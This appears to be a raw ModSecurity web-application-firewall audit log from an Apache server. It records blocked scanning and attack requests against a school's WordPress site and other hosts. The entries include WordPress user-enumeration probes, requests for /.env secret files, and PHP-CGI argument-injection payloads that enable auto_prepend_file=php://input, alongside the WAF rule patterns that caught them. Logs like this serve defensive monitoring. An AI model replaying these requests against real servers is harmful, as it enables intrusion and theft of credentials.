X-Real-IP: 156.253.168.230
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.168.230
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--6f958d4e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f958d4e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745626861704658 2618 (- - -)
Stopwatch2: 1745626861704658 2618; combined=1081, p1=375, p2=682, p3=0, p4=0, p5=24, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f958d4e-Z--
--a0da7210-A--
[26/Apr/2025:07:21:04 +0700] aAwm8HGCMLWH05JCdxzhjgAAAJU 103.236.140.4 48480 103.236.140.4 8181
--a0da7210-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.253.168.230
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.253.168.230
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--a0da7210-C--
demo.sayHello
--a0da7210-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0da7210-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745626864496297 6292 (- - -)
Stopwatch2: 1745626864496297 6292; combined=4301, p1=522, p2=3497, p3=28, p4=33, p5=125, sr=72, sw=96, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0da7210-Z--
--57ed667e-A--
[26/Apr/2025:08:31:48 +0700] aAw3hNQ6lpQjDvc0F_NxlwAAANY 103.236.140.4 56372 103.236.140.4 8181
--57ed667e-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 103.159.155.105
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.159.155.105
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--57ed667e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--57ed667e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745631108917607 3136 (- - -)
Stopwatch2: 1745631108917607 3136; combined=1381, p1=470, p2=864, p3=0, p4=0, p5=46, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--57ed667e-Z--
--b967154a-A--
[26/Apr/2025:09:07:02 +0700] aAw_xtDEbIDiBZnoTx4isAAAAEc 103.236.140.4 50800 103.236.140.4 8181
--b967154a-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 142.93.129.190
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 142.93.129.190
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--b967154a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b967154a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745633222190932 738 (- - -)
Stopwatch2: 1745633222190932 738; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=59, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b967154a-Z--
--fcb74931-A--
[26/Apr/2025:09:07:17 +0700] aAw_1XGCMLWH05JCdxz55wAAAJQ 103.236.140.4 51402 103.236.140.4 8181
--fcb74931-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 213.158.93.227
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 213.158.93.227
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--fcb74931-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcb74931-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745633237424305 2507 (- - -)
Stopwatch2: 1745633237424305 2507; combined=1167, p1=400, p2=740, p3=0, p4=0, p5=27, sr=82, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcb74931-Z--
--e43aba64-A--
[26/Apr/2025:09:15:04 +0700] aAxBqNDEbIDiBZnoTx4m4gAAAFY 103.236.140.4 40270 103.236.140.4 8181
--e43aba64-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 107.161.179.66
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 107.161.179.66
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--e43aba64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e43aba64-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745633704843941 3751 (- - -)
Stopwatch2: 1745633704843941 3751; combined=1916, p1=616, p2=1265, p3=0, p4=0, p5=35, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e43aba64-Z--
--f85a982b-A--
[26/Apr/2025:09:28:58 +0700] aAxE6k3IXD9XJ6lrmIXILgAAAAk 103.236.140.4 60228 103.236.140.4 8181
--f85a982b-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 213.108.152.211
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 213.108.152.211
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--f85a982b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f85a982b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745634538458764 2113 (- - -)
Stopwatch2: 1745634538458764 2113; combined=868, p1=285, p2=560, p3=0, p4=0, p5=23, sr=47, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f85a982b-Z--
--7b666c57-A--
[26/Apr/2025:09:54:28 +0700] aAxK5NDEbIDiBZnoTx44FgAAAFY 103.236.140.4 55564 103.236.140.4 8181
--7b666c57-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 107.170.12.138
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 107.170.12.138
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--7b666c57-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7b666c57-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745636068147153 834 (- - -)
Stopwatch2: 1745636068147153 834; combined=353, p1=309, p2=0, p3=0, p4=0, p5=43, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7b666c57-Z--
--e0c23b0f-A--
[26/Apr/2025:10:17:10 +0700] aAxQNtQ6lpQjDvc0F_OrIgAAANQ 103.236.140.4 49252 103.236.140.4 8181
--e0c23b0f-B--
GET /.env HTTP/1.0
Host: mignere.twilightparadox.com
X-Real-IP: 165.227.173.41
X-Forwarded-Host: mignere.twilightparadox.com
X-Forwarded-Server: mignere.twilightparadox.com
X-Forwarded-For: 165.227.173.41
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--e0c23b0f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e0c23b0f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745637430589356 779 (- - -)
Stopwatch2: 1745637430589356 779; combined=307, p1=271, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e0c23b0f-Z--
--cf25c939-A--
[26/Apr/2025:10:32:38 +0700] aAxT1tDEbIDiBZnoTx5FhAAAAE8 103.236.140.4 55596 103.236.140.4 8181
--cf25c939-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 216.10.250.218
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 216.10.250.218
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--cf25c939-C--
--cf25c939-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cf25c939-E--
--cf25c939-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745638358227177 4993 (- - -)
Stopwatch2: 1745638358227177 4993; combined=3409, p1=594, p2=2776, p3=0, p4=0, p5=39, sr=132, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cf25c939-Z--
--ce606115-A--
[26/Apr/2025:10:40:57 +0700] aAxVydDEbIDiBZnoTx5GMQAAAE4 103.236.140.4 57606 103.236.140.4 8181
--ce606115-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 187.103.206.46
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 187.103.206.46
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--ce606115-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce606115-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745638857464161 3096 (- - -)
Stopwatch2: 1745638857464161 3096; combined=1504, p1=522, p2=951, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce606115-Z--
--ec8b180e-A--
[26/Apr/2025:12:08:40 +0700] aAxqWHGCMLWH05JCdxwgIQAAAI0 103.236.140.4 49786 103.236.140.4 8181
--ec8b180e-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 190.123.207.167
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 190.123.207.167
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--ec8b180e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ec8b180e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745644120715244 2830 (- - -)
Stopwatch2: 1745644120715244 2830; combined=1227, p1=414, p2=784, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ec8b180e-Z--
--f5ed3922-A--
[26/Apr/2025:12:13:40 +0700] aAxrhNDEbIDiBZnoTx5KWwAAAE0 103.236.140.4 50886 103.236.140.4 8181
--f5ed3922-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 103.92.155.6
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.92.155.6
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--f5ed3922-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f5ed3922-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745644420491778 3541 (- - -)
Stopwatch2: 1745644420491778 3541; combined=1533, p1=521, p2=973, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f5ed3922-Z--
--84080413-A--
[26/Apr/2025:12:17:45 +0700] aAxseXGCMLWH05JCdxwhLwAAAII 103.236.140.4 51836 103.236.140.4 8181
--84080413-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 213.134.39.163
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 213.134.39.163
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--84080413-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--84080413-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745644665948829 2470 (- - -)
Stopwatch2: 1745644665948829 2470; combined=1417, p1=438, p2=945, p3=0, p4=0, p5=34, sr=98, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--84080413-Z--
--a7a3fd41-A--
[26/Apr/2025:12:50:49 +0700] aAx0OdDEbIDiBZnoTx5M5AAAAFA 103.236.140.4 59448 103.236.140.4 8181
--a7a3fd41-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 116.58.24.131
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 116.58.24.131
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--a7a3fd41-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a7a3fd41-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745646649893881 2865 (- - -)
Stopwatch2: 1745646649893881 2865; combined=1526, p1=467, p2=1016, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a7a3fd41-Z--
--9bafbf7d-A--
[26/Apr/2025:12:53:56 +0700] aAx09NDEbIDiBZnoTx5NKQAAAEE 103.236.140.4 60218 103.236.140.4 8181
--9bafbf7d-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--9bafbf7d-C--
--9bafbf7d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bafbf7d-E--
--9bafbf7d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745646836387890 5326 (- - -)
Stopwatch2: 1745646836387890 5326; combined=3425, p1=597, p2=2787, p3=0, p4=0, p5=41, sr=96, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bafbf7d-Z--
--85a8c57e-A--
[26/Apr/2025:14:41:55 +0700] aAyOQ9DEbIDiBZnoTx5TxgAAAEc 103.236.140.4 57106 103.236.140.4 8181
--85a8c57e-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 146.190.63.248
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 146.190.63.248
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--85a8c57e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--85a8c57e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745653315141751 901 (- - -)
Stopwatch2: 1745653315141751 901; combined=291, p1=257, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--85a8c57e-Z--
--909e456a-A--
